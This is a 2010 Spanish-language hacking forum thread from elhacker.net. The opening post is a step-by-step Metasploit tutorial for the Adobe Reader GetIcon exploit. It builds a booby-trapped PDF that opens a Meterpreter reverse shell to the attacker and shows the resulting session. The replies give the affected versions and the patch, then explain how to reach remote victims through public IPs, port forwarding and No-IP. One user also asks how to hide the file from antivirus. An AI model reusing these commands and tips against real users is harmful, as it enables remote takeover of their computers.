elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 17:30  


Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, TRICKY)
| | |-+  [MetaSploit] Adobe_GetIcon (Metodo fileformat)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [MetaSploit] Adobe_GetIcon (Metodo fileformat)  (Leído 5,129 veces)
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.507


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
[MetaSploit] Adobe_GetIcon (Metodo fileformat)
« en: 11 Febrero 2010, 23:33 »

Adobe_GetIcon StackOverflow by R.N.A.

Detalles de la vulnerabilidad: Esta vulnerabilidad permite a un atacante remoto ejecutar codigo arbitrariamente en una instalacion vulnerable de AdobeReader o AdobeAcrobat. En esta vulnerabilidad la interaccion del usuario es requerida ya que este debe de abrir un archivo especialmente modificado (El metodo que vamos a tratar) o visitando un sitio web malicioso.

La vulnerabilidad se debe a que no se verifican los argumentos que son pasados a GetIcon(). En caso de que el ataque tenga exito se podra ejecutar codigo con los privilegios del usuario que ejecuto el archivo especialmente modificado.

Explotando la vulnerabilidad

1) Lanzamos metasploit
Código:
rna@MyPersonalLab:~$ msfconsole

2) ya dentro del metasploit seleccionamos el exploit que vamos a utilizar, en nuestro caso:
Código:
msf > use exploit/windows/fileformat/adobe_geticon

3) Verificamos las opciones que tiene el exploit:
Código:
msf exploit(adobe_geticon) > show options

Aqui vemos dos opciones

a)FILENAME: Es el nombre que le daremos al archivo PDF.
b)OUTPUTPATH: Es la ruta en la cual crearemos el PDF.

Tenemos otra opcion que no aparece dentro de las opciones comunes que se muestran con Show Options

WfsDelay: Es el tiempo en segundos que se esperara para recibir la conexión inversa.

4) Modificamos las opciones rellenando con los parametros que queremos.

Código:
msf exploit(adobe_geticon) > set FILENAME adobe_geticon.
FILENAME => adobe_geticon.pdf
msf exploit(adobe_geticon) > set OUTPUTPATH /opt
OUTPUTPATH => /opt
msf exploit(adobe_geticon) > set WfsDelay 3600
WfsDelay => 3600

5) Seleccionamos el payload que deseamos que tenga el exploit
Código:
msf exploit(adobe_geticon) >set payload  windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

6) Ahora modificamos las opciones de payload, aquí nos encargaremos de poner nuestra ip (LHOST) y el puerto en el que estamos en escucha (LPORT):
Código:
msf exploit(adobe_geticon) > set LHOST 192.168.10.2
LHOST => 192.168.10.2
msf exploit(adobe_geticon) > set LPORT 777
LPORT => 777

7) Ahora creamos el PDF modificado ya que estan todas las opciones requeridas completas
Código:
msf exploit(adobe_geticon) >exploit
[*] Started reverse handler on 192.168.10.102:4444

[*] Creating 'msf.pdf' file...

[*] Generated output file /opt/adobe_geticon.pdf


8) Ahora ejecutamos el PDF en un ordenador vulnerable por cualquier metodo posible (Ingenieria Inversa, Un Laboratorio Virtual[Preferiblemente], etc).
Código:
[*] Meterpreter session 1 opened (192.168.10.103:1968 -> 192.168.10.102:4444)



Y listo ya tenemos acceso al ordenador afectado
« Última modificación: 11 Febrero 2010, 23:53 por El Pollo Profeta » En línea

ikary

Desconectado Desconectado

Mensajes: 127


Ver Perfil
Re: [MetaSploit] Adobe_GetIcon (Metodo fileformat)
« Respuesta #1 en: 12 Febrero 2010, 00:10 »

Gracias El Pollo Profeta, solo un aporte:
Citar
AFFECTED SOFTWARE VERSIONS

Adobe Reader 9 and earlier versions
Adobe Acrobat 9 Standard, Pro, and Pro Extended and earlier versions

Adobe Security bulletin: http://www.adobe.com/support/security/bulletins/apsb09-04.html
Viene a decir que las versiones 9 y anteriores son vulnerables, ya se encuentra la version 9.1 (la cual ya han corregido el problema) en esa pagina para actualizar.

Un saludo ^^
« Última modificación: 12 Febrero 2010, 00:19 por ikary » En línea
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.507


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: [MetaSploit] Adobe_GetIcon (Metodo fileformat)
« Respuesta #2 en: 12 Febrero 2010, 00:33 »

:xD sabia que me falto algo !!!
En línea

illera88


Desconectado Desconectado

Mensajes: 403


Ver Perfil
Re: [MetaSploit] Adobe_GetIcon (Metodo fileformat)
« Respuesta #3 en: 12 Febrero 2010, 12:04 »

Muchas gracias Pollo!!! Estaba esperando algo asi desde hace tiempo.
Enhorabuena por tu aportación ;);)
En línea
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: [MetaSploit] Adobe_GetIcon (Metodo fileformat)
« Respuesta #4 en: 12 Febrero 2010, 17:38 »

Very Nice!. Excelente Aporte!  :rolleyes:
En línea

---
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.507


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: [MetaSploit] Adobe_GetIcon (Metodo fileformat)
« Respuesta #5 en: 12 Febrero 2010, 18:27 »

Al parecer me salio bien... osea que podria proponerme hacer otros tutoriales
En línea

Novlucker
Ninja y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 10.239


Yo que tu lo pienso dos veces


Ver Perfil
Re: [MetaSploit] Adobe_GetIcon (Metodo fileformat)
« Respuesta #6 en: 12 Febrero 2010, 18:32 »

Además esta vulnerabilidad sigue siendo de las MUY explotadas :P

https://foro.elhacker.net/seguridad/aviso_los_hackers_rusos_descubren_tuenti-t282566.0.html
:http://wepawet.iseclab.org/view.php?hash=c7eba9f19319bf5c85add5c7f8f43b07&type=js

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.507


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: [MetaSploit] Adobe_GetIcon (Metodo fileformat)
« Respuesta #7 en: 12 Febrero 2010, 19:11 »

Esto se debe a una falta de educacion en lo que se refiere a seguridad informatica por parte de los usuarios, segun tengo entendido se lanzo una version de AdobeReader con este problema ya solucionado pero muchos siguen con versiones antiguas del producto y por lo tanto son vulnerables a estos ataques.
En línea

illera88


Desconectado Desconectado

Mensajes: 403


Ver Perfil
Re: [MetaSploit] Adobe_GetIcon (Metodo fileformat)
« Respuesta #8 en: 15 Febrero 2010, 11:44 »

Muy buenas. Tengo una duda.
si quiero hacer este mismo proceso pero en un PC remoto??? Porque veo que este ejemplo es para una red local por el rango de IPs que pones (set LHOST 192.168...). Sin embargo si lo quiero hacer con una IP pública? Funcionaría poniendo nuestra IP ública? Necesitariamos el No-IP como con el bifrost???

Citar
Un Laboratorio Virtual[Preferiblemente],
Que es esto?

un saludo
En línea
ikary

Desconectado Desconectado

Mensajes: 127


Ver Perfil
Re: [MetaSploit] Adobe_GetIcon (Metodo fileformat)
« Respuesta #9 en: 15 Febrero 2010, 12:01 »

Este ataque lo que hace es explotar una vulnerabilidad de Adobe, mas concretamente los "lectores" de PDF, y permite la ejecucion de codigo arbitrario al abrir un PDF aparentemente inofensivo.

Puedes poner una IP publica tranquilamente, simplemente recuerda redireccionar desde tu router.
Para ESTE ataque en concreto si seria preferible usar No-IP, ya que no es un ataque instantaneo, la victima puede tardar incluso varios dias en abrir el PDF, y es muy probable que la IP que tuvieses en el momento de crear el exploit ya hubiese cambiado.

Espero que te sirva.

Un saludo
En línea
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.507


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: [MetaSploit] Adobe_GetIcon (Metodo fileformat)
« Respuesta #10 en: 15 Febrero 2010, 14:10 »

Muy buenas. Tengo una duda.
si quiero hacer este mismo proceso pero en un PC remoto??? Porque veo que este ejemplo es para una red local por el rango de IPs que pones (set LHOST 192.168...). Sin embargo si lo quiero hacer con una IP pública? Funcionaría poniendo nuestra IP ública? Necesitariamos el No-IP como con el bifrost???

Citar
Un Laboratorio Virtual[Preferiblemente],
Que es esto?

un saludo

En lo que te refieres a un PC remoto solo tendrias que redireccionar los puertos en tu Router para que el trafico que llegue por ese puerto llegue al ordenador atacante y en LHOST colocar tu IP publica.

En lo que se refiere a un laboratorio virtual es la simulacion de 1 o mas PCs dentro de maquinas virtuales, eso economiza espacio, energia electrica y dinero :xD
En línea

[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.507


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: [MetaSploit] Adobe_GetIcon (Metodo fileformat)
« Respuesta #11 en: 15 Febrero 2010, 14:11 »

Este ataque lo que hace es explotar una vulnerabilidad de Adobe, mas concretamente los "lectores" de PDF, y permite la ejecucion de codigo arbitrario al abrir un PDF aparentemente inofensivo.

Puedes poner una IP publica tranquilamente, simplemente recuerda redireccionar desde tu router.
Para ESTE ataque en concreto si seria preferible usar No-IP, ya que no es un ataque instantaneo, la victima puede tardar incluso varios dias en abrir el PDF, y es muy probable que la IP que tuvieses en el momento de crear el exploit ya hubiese cambiado.

Espero que te sirva.

Un saludo

Tambien debe de tomar en cuenta que el equipo al cual envie el PDF tenga un lector de PDF vulnerable (AdobeReader<9.1)
En línea

illera88


Desconectado Desconectado

Mensajes: 403


Ver Perfil
Re: [MetaSploit] Adobe_GetIcon (Metodo fileformat)
« Respuesta #12 en: 15 Febrero 2010, 18:31 »

ok, no sabia lo que era laboratorio virtual.
Citar
redireccionar los puertos en tu Router
No entiendo del todo esto, a que os referis?
Gracias a los dos ;);)
En línea
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: [MetaSploit] Adobe_GetIcon (Metodo fileformat)
« Respuesta #13 en: 15 Febrero 2010, 18:43 »

No entiendo del todo esto, a que os referis?
Cuando el P.C a atacar esta bajo un router, no podemos atacarlo directamente. Por eso esque aveces en el Nmap, aparece, 445/tcp filtered microsoft-ds (Aunque tambien puede ser por el FW, entre otros), en este caso esta filtrado por un router, al momento de atacarlo, vá a generar un error porque no puede procesar nuestra peticion [[-] Exploit failed: Login Failed: The SMB server did not reply to our request]. Para lograr nuestro cometido, necesitamos ingresar al router, abrir el puerto para despues atacarlo con nuestro Metasploit
En línea

---
illera88


Desconectado Desconectado

Mensajes: 403


Ver Perfil
Re: [MetaSploit] Adobe_GetIcon (Metodo fileformat)
« Respuesta #14 en: 18 Febrero 2010, 03:18 »

este exploit es detectado por los AV????
Recuerdo un post tuyo (shell root) en otro foro y sobre otro exploit en el que hablabas de un comando que no recuerdo que era para cifrar u ocultar el archivo infectado a los AV... Lo he estado buscando peor no lo encuentro. Cual era?
Un saludo ;);)
En línea
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines